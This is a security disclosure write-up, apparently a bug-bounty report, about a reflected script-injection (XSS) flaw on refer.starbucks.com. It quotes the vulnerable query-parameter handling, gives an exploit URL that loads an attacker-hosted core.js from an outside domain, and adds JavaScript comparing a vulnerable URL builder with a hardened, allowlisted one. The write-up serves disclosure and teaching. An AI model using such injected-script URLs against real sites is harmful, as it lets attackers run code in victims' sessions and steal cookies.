Reflected XSS in refer.starbucks.com

I have found a reflected XSS vulnerability on http://refer.starbucks.com. Below are the details:

  1. Go to http://happymondays.starbucks.com, scroll down and click the “Invite a friend” button. You will be redirected to http://refer.starbucks.com/micro/microsite?source=redirect
  2. On http://refer.starbucks.com/micro/microsite?source=redirect there are three buttons to “Spread the love”:

SHARE WITH EMAIL

SHARE ON FACEBOOK

SHARE ON TWITTER

Clicking on each of them generates a request like this:

GET /xd-arbiter?mediaServer=http://tags.extole.com&clientId=106223&socketId=facebook_4 HTTP/1.1
Host: refer.starbucks.com

A query parameter that names an external server should immediately catch your attention. A quick look at the page's source code confirms the problem: the client-side script reads the parameters straight from the query string and uses them to build the src of a script it inserts into the page, so whoever controls the URL controls which script runs in the origin of refer.starbucks.com:

var MEDIA_SERVER = queryArgs.mediaServer;
var CLIENT_ID = queryArgs.clientId;
var SOCKET_ID = queryArgs.socketId;
(…)
insertScript(MEDIA_SERVER + '/' + CLIENT_ID + '/core.js');

So MEDIA_SERVER can be an attacker-controlled origin (here https://lubi.cz), CLIENT_ID an arbitrary path segment (here the “starbucks” directory), SOCKET_ID anything at all, and the page ends up loading https://lubi.cz/starbucks/core.js, an attacker-hosted script, with full access to the refer.starbucks.com DOM and cookies. To execute a payload, host your core.js at that path and visit the following link:

http://refer.starbucks.com/xd-arbiter?mediaServer=https://lubi.cz&clientId=starbucks&socketId=1
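To make the mechanism concrete, here is an added example (not the page's, Extole's or Starbucks' code) that reproduces the vulnerable URL construction from the snippet above and puts a hardened version beside it. The allowlist of media servers, the numeric shape required of clientId and all function names are assumptions made for the illustration; the input strings are the query strings quoted on this page.

```javascript
// Added example: vulnerable vs. hardened construction of the core.js URL.
// Not the site's actual code; helper names and the allowlist are assumed.

// Parse a query string the way the arbiter page would (first value wins,
// values URL-decoded).
function parseQueryArgs(search) {
  const args = {};
  const params = new URLSearchParams(search.startsWith('?') ? search.slice(1) : search);
  for (const [key, value] of params) {
    if (!(key in args)) args[key] = value;
  }
  return args;
}

// Vulnerable: mirrors the snippet on this page. Both the origin and the first
// path segment of the script come straight from the attacker-controlled URL,
// so any host and any path can be loaded as <script> in the page's origin.
function buildScriptUrlVulnerable(search) {
  const queryArgs = parseQueryArgs(search);
  const MEDIA_SERVER = queryArgs.mediaServer;
  const CLIENT_ID = queryArgs.clientId;
  return MEDIA_SERVER + '/' + CLIENT_ID + '/core.js';
}

// Hardened: the origin must be one of a fixed set of known media servers
// (assumed values, https only; the legitimate request on this page used
// http://, which the fixed page would need to stop doing), and the client id
// must match the numeric shape seen in the legitimate request (assumed).
const ALLOWED_MEDIA_SERVERS = new Set([
  'https://tags.extole.com', // assumed: the legitimate host from the request
]);
const CLIENT_ID_RE = /^[0-9]{1,12}$/;

function buildScriptUrlHardened(search) {
  const queryArgs = parseQueryArgs(search);
  const mediaServer = queryArgs.mediaServer;
  const clientId = queryArgs.clientId;
  if (!ALLOWED_MEDIA_SERVERS.has(mediaServer)) return null; // unknown origin: refuse
  if (typeof clientId !== 'string' || !CLIENT_ID_RE.test(clientId)) return null; // no "../", no "starbucks"
  // Reassemble from validated pieces only; URL() normalises the path for us.
  return new URL('/' + clientId + '/core.js', mediaServer).href;
}
```

With the exploit URL from above, the vulnerable builder happily returns https://lubi.cz/starbucks/core.js, while the hardened builder returns null for that input and for any downgrade to http://, and still produces https://tags.extole.com/106223/core.js for the legitimate request. The lesson is the usual one: a script src must never be assembled from a caller-supplied origin, only selected from a list the page owns.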
